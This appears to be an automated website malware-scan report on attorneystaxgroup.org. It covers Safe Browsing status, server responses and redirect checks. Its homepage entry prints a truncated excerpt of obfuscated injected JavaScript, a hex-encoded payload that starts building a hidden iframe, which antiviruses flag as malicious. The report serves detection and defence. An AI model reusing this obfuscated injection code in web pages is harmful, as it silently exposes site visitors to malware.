Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=attorneystaxgroup.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://attorneystaxgroup.org/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 03 Mar 2015 01:57:10 GMT Pragma: no-cache Location: http://www.attorneystaxgroup.org/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=v54tijk5gi96f6fjts7qich5r4; path=/ X-Pingback: http://www.attorneystaxgroup.org/xmlrpc.php | clean |
http://www.attorneystaxgroup.org/ | 200 OK Content-Length: 41891 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) vjx="s"+"p"+"li"+"t";dovx=window;yin="dy";vasqel=document;yfzg="0x";kbkbti=(5-3-1);try{++(vasqel.body)}catch(vrcaf){tlqgjr=false;try{}catch(egftu){tlqgjr=21;}if(1){scz="17:5d:6c:65:5a:6b:60:66:65:17:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4 Antivirus reports:
| ||
http://www.attorneystaxgroup.org/wp-includes/js/comment-reply.min.js?ver=3.8.5 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://www.attorneystaxgroup.org/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: text/javascript | clean |
http://www.attorneystaxgroup.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.attorneystaxgroup.org/wp-content/themes/spark/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.attorneystaxgroup.org/wp-content/themes/spark <script type= | 406 Not Acceptable Content-Length: 226 Content-Type: text/html | clean |
http://www.attorneystaxgroup.org/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://twitter.com/javascripts/blogger.js | HTTP/1.1 301 Moved Permanently Date: Tue, 03 Mar 2015 01:57:20 UTC Location: https://twitter.com/javascripts/blogger.js Server: tsa_b Content-Length: 0 Set-Cookie: guest_id=v1%3A142534784057320321; Domain=.twitter.com; Path=/; Expires=Thu, 02-Mar-2017 01:57:20 UTC X-Connection-Hash: 6ff53633142513ea65b34fdeefb5ad14 X-Response-Time: 3 | clean |
https://twitter.com/javascripts/blogger.js | 404 Not Found Content-Length: 4311 Content-Type: text/html | clean |
https://abs.twimg.com/errors/404-4f54405af9c0bcdecbe656ca8893f7a9.js | 200 OK Content-Length: 10803 Content-Type: application/javascript | clean |
https://twitter.com/ | 200 OK Content-Length: 59441 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/en/init.fa3f348769b188e718876f5b43fce04a9588490c.js | 200 OK Content-Length: 303086 Content-Type: application/javascript | clean |
https://twitter.com/?lang=id | 200 OK Content-Length: 59739 Content-Type: text/html | clean |
https://abs.twimg.com/c/swift/id/init.e1df894a06bc90e1e494b9e5af3de070e5d81f2a.js | 200 OK Content-Length: 303104 Content-Type: application/javascript | clean |
https://twitter.com/?lang=msa | 200 OK Content-Length: 59902 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: attorneystaxgroup.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 01:57:10 GMT
Pragma: no-cache
Location: http://www.attorneystaxgroup.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=v54tijk5gi96f6fjts7qich5r4; path=/
X-Pingback: http://www.attorneystaxgroup.org/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: attorneystaxgroup.org
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Mar 2015 01:57:10 GMT
Pragma: no-cache
Location: http://www.attorneystaxgroup.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=v54tijk5gi96f6fjts7qich5r4; path=/
X-Pingback: http://www.attorneystaxgroup.org/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: attorneystaxgroup.org
Referer: http://www.google.com/search?q=attorneystaxgroup.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: attorneystaxgroup.org
Referer: http://www.google.com/search?q=attorneystaxgroup.org
Result:
The result is similar to the first query. There are no suspicious redirects found.